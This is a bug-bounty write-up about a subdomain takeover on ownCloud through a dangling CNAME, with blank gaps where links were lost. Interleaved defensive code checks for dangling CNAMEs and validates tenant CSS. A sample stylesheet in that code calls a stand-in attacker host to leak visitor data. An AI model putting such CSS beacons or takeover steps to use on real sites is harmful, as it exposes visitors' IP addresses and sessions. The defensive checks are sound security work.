Subdomain takeover [Awarded $200]

The story is simple, the reward was “alright”. Let’s start. ^_^

I came across a website known as ownCloud. Their bug bounty program is located here — and their H1 program is located here

Their bounty program looked nice and juicy and I wanted some dough ( 🤑 )

So I ran [pretty sure everyone is aware of this] and I came across a domain that was displayed as

So I did a quick lookup on its CNAME: it points to but somehow wasn’t reflecting back on their domain. CNAME check tool I used —

I then registered a demo account and saw that they had a custom page where you could set whichever domain you wanted.

I then pointed the domain to my testing domain on and saw that my inputs reflected over to
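The dangling-CNAME condition the steps above describe (a subdomain whose CNAME points at a third-party host that no longer resolves, so a new tenant on that provider can claim it) is what a defender should be inventorying before anyone else does. The following is an added example, not the author's tooling or anything from ownCloud: it walks CNAME chains with an injected resolver so it runs offline here against a constructed record map (all names under `example.test` and `hosting-provider.test` are hypothetical). A takeover candidate is a name whose chain ends in NXDOMAIN after at least one CNAME hop; a plain NXDOMAIN with no CNAME is just a nonexistent name, and a CNAME loop is reported separately.

```python
"""Offline dangling-CNAME check (added example, not from the original post).

`classify` follows a name through CNAME records until it reaches a
non-CNAME record ("ok"), a name with no record at all ("dangling" if a
CNAME led there, "nxdomain" otherwise), or a loop. The resolver is a
plain callable so a real DNS lookup (e.g. one built on dnspython) can be
passed in production; here a constructed zone map stands in for DNS.
"""
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample zone: hypothetical names, not ownCloud's records.
# Each entry maps a name to (record type, value).
SAMPLE_ZONE: Dict[str, Tuple[str, str]] = {
    "www.example.test": ("A", "198.51.100.10"),
    "files.example.test": ("CNAME", "tenant-old.hosting-provider.test"),
    "docs.example.test": ("CNAME", "tenant-live.hosting-provider.test"),
    "tenant-live.hosting-provider.test": ("A", "203.0.113.5"),
    "loop-a.example.test": ("CNAME", "loop-b.example.test"),
    "loop-b.example.test": ("CNAME", "loop-a.example.test"),
    # tenant-old.hosting-provider.test is intentionally absent: NXDOMAIN.
}

Resolver = Callable[[str], Optional[Tuple[str, str]]]


def lookup(name: str) -> Optional[Tuple[str, str]]:
    """Stand-in resolver: returns the record for a name or None (NXDOMAIN)."""
    return SAMPLE_ZONE.get(name.lower().rstrip("."))


def classify(name: str, resolve: Resolver = lookup, max_hops: int = 8) -> Tuple[str, List[str]]:
    """Classify a name as ok / dangling / nxdomain / loop / too-long.

    Returns (status, chain) where chain lists every name visited.
    """
    chain = [name]
    current = name
    for _ in range(max_hops):
        record = resolve(current)
        if record is None:
            # No record at the end of the chain. Only a takeover candidate
            # when we got here by following at least one CNAME.
            return ("dangling" if len(chain) > 1 else "nxdomain", chain)
        rtype, value = record
        if rtype != "CNAME":
            return ("ok", chain)
        if value in chain:
            return ("loop", chain + [value])
        chain.append(value)
        current = value
    return ("too-long", chain)


def find_dangling(names: List[str], resolve: Resolver = lookup) -> List[str]:
    """Return the subset of names whose CNAME chain ends in NXDOMAIN."""
    return [n for n in names if classify(n, resolve)[0] == "dangling"]


if __name__ == "__main__":
    for n in SAMPLE_ZONE:
        status, chain = classify(n)
        print(f"{status:9} {' -> '.join(chain)}")
    print("takeover candidates:", find_dangling(list(SAMPLE_ZONE)))
```

A "dangling" result is the trigger for cleanup (delete the CNAME or re-claim the provider resource), not proof of exploitability by itself: whether a stranger can actually register the target name depends on the provider, which is why production scanners also compare the target against provider-specific fingerprints.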

I also noticed that they had an advanced page in the settings which allows you to use custom CSS. I cooked up IP-grabber and cookie-grabber code via CSS to show how this could be escalated.
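Tenant-supplied CSS escalates a takeover because any `url()` or `@import` in the stylesheet makes every visitor's browser fetch from a host the tenant chooses, which leaks at least the visitor's IP address. The following is an added example of the server-side check an application with such a feature would want, not ownCloud's code: a conservative validator that rejects `@import` outright and rejects any `url()` whose host is not on an allowlist (the allowlist host and the sample stylesheets are constructed). It is a regex tokenizer, not a full CSS parser, so it belongs alongside a Content-Security-Policy on the page that serves the theme rather than in place of one.

```python
"""Conservative validator for tenant-supplied custom CSS (added example,
not from the original post or from ownCloud).

Rejects stylesheets that would make a viewer's browser contact a host
outside ALLOWED_HOSTS. Relative URLs (same origin) and data: URLs (no
network request) are accepted; @import is refused entirely because an
imported sheet can carry its own external references.
"""
import re
from typing import List
from urllib.parse import urlparse

ALLOWED_HOSTS = {"static.example.test"}  # constructed allowlist for the demo

_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# url('...'), url("...") or bare url(...); the three groups are the variants.
_URL_RE = re.compile(r"""url\(\s*(?:'([^']*)'|"([^"]*)"|([^)\s]*))\s*\)""", re.I)
_IMPORT_RE = re.compile(r"@import\b", re.I)


def url_references(css: str) -> List[str]:
    """Extract the target of every url() token, comments removed."""
    css = _COMMENT_RE.sub("", css)
    refs = []
    for m in _URL_RE.finditer(css):
        refs.append(next(g for g in m.groups() if g is not None))
    return refs


def is_disallowed(ref: str) -> bool:
    """True when fetching `ref` would reach a host outside the allowlist."""
    ref = ref.strip()
    if ref.startswith("#"):
        return False  # fragment reference within the same document
    parts = urlparse(ref)
    if parts.scheme == "data":
        return False  # inline data, no request is made
    if parts.scheme and parts.scheme not in ("http", "https"):
        return True  # javascript:, file:, etc. are never acceptable
    if not parts.netloc:
        return False  # relative URL: same origin as the page
    return (parts.hostname or "").lower() not in ALLOWED_HOSTS


def validate_custom_css(css: str) -> List[str]:
    """Return a list of violations; an empty list means the CSS is accepted."""
    css_no_comments = _COMMENT_RE.sub("", css)
    problems = []
    if _IMPORT_RE.search(css_no_comments):
        problems.append("@import is not permitted")
    for ref in url_references(css_no_comments):
        if is_disallowed(ref):
            problems.append(f"external reference not permitted: {ref}")
    return problems


# Constructed sample stylesheets for the demo.
SAFE_CSS = """/* tenant theme */
body { background: url("img/bg.png"); }
.logo { background-image: url(https://static.example.test/logo.svg); }
.icon { background: url(data:image/png;base64,iVBORw0KGgo=); }
"""

BAD_CSS = """body { background: url('https://collector.attacker.test/pixel.gif?u=1'); }
@import url(https://collector.attacker.test/t.css);
"""

if __name__ == "__main__":
    print("safe:", validate_custom_css(SAFE_CSS))
    print("bad: ", validate_custom_css(BAD_CSS))
```

The check deliberately errs toward rejection: scheme-relative references such as `//host/path` are treated as external, and a data: URL is only allowed in `url()` because `@import` is refused before that point. The viewer-IP leak still exists toward any host on the allowlist, so the allowlist should contain only hosts the operator controls.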

I swiftly reported it and, within 2 hours, the issue was fixed (handled over email). I was then told to send the report on HackerOne and I got my bounty.

I thought I would have gotten $5k for their subdomain takeover, but turns out it was $200 since .ownCloud was out of scope. However, I’d deem this as a very high security risk and the payout should have been more, but what can you do — the company has “more rights” to your inputs than you yourself.

Grateful, but not satisfied.

4/20/2019: issue reported; fixed 2 hours later.

Email discussion for 3 weeks, until 5/6/2019.

Paid out on 5/7/2019: $200.

Worth it? Not sure.

Thanks for reading.

If you have questions regarding this, feel free to shoot me a DM on Twitter, or join our Discord server to get help from any of the hundreds of people there, or just to talk to other Hax0rs.